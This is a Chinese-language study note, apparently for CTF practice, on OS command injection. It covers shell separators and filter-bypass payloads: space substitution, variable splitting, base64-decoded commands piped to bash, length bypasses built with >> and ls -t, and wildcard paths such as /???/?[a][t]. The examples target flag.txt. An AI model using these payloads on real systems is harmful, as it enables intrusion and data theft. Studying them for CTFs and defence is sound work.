命令执行漏洞

命令执行漏洞

命令执行漏洞简介：用户提交的数据能被windows，linux当成命令执行。
命令执行漏洞拼接符号

&：无论左边是false还是true，右边都执行
|:无论左边是false还是true，右边都会执行
&&：具有短路效果，左边是false，右边不执行。	
||：具有短路效果，左边是true，右边不执行。
反引号和$()中的内容会被当成命令首先执行。
windows:
&:前面语句为假时直接执行后面的命令。
&&：前面的语句为假时直接出错，后面的命令也不执行
|：直接执行后面的语句
||：前面出错执行后面的语句
linux:
;:前面的执行完执行后面的
&:无论前面的语句真假都会执行
&&：只有前面为真时才执行后面
|:显示后面的执行结果
||：当前面的执行错误时执行后面的

命令执行绕过
空格绕过

1.使用${IFS}/${IFS}$1/$IFS$1等符号替代空格
2.重定向符号:<>/<
3.%09（php中的空格)

黑名单绕过

1.使用shell变量拼接被黑名单限制的关键词
a=c;b=at;c=fl;d=ag;e=.txt;$a$b $c$d$e;
2.编码
使用反引号包含base64解码后的命令
`echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d`
将base64解码后的命令通过管道符传递给bash
echo "Y2F0IGZsYWcudHh0Cg==" | base64 -d | bash
3.在命令中添加特殊字符（单引号/双引号/\(反斜杠)/$1）
c''a""t f\l$1ag

读文件函数

(1)more:一页一页的显示档案内容
(2)less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页
(3)head:查看头几行
(4)tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示
(5)tail:查看尾几行
(6)nl：显示的时候，顺便输出行号
(7)od:以二进制的方式读取档案内容
(8)vi:一种编辑器，这个也可以查看
(9)vim:一种编辑器，这个也可以查看
(10)sort:可以查看
(11)uniq:可以查看
(12)file -f:报错出具体内容

长度绕过

1.使用>>绕过长度限制
使用>>每次添加一部分命令到文件中
echo -n "cmd1" > r;
echo -n "cmd2" >> r;
echo -n "cmd3" >> r;
echo "cmd4" >> r;
然后使用cat r | bash执行命令
2.使用换行执行和ls -t绕过长度限制
linux中，文件中的命令如果需要换行书写，需要在前一行末尾增加\，如文件a中有
ca\
t flag.t\
xt

使用sh a即可执行命令cat flag.txt

ls -t可根据时间创建顺序逆序输出文件名

a可以创建一个名为a的文件

按照这个思路，可以使用

> "ag"
> "fl\\"
> "t \\"
> "ca\\"

然后使用ls -t > s

s中文件内容就是

s
ca\
t \
fl\
ag\
其他的无关内容

之后使用sh s，即可执行cat flag

通配符绕过
/???会去寻找 / 目录下的三个字符长度的文件，正常情况下会寻找到/bin，然后/?[a][t]会优先匹配到/bin/cat,就成功调用了cat命令，然后后面可以使用正常的通配符匹配所需读的文件，如flag.txt文件名长度为8，使用8个?’’，此命令就会读取所有长度为8的文件。
/???/?[a][t] ?’’?’’?’’?’’?’’?’’?’’?’’
命令嵌套
echo “result:whoami”
echo “result:$(uname -a)”
参考：https://www.bilibili.com/read/cv8197693/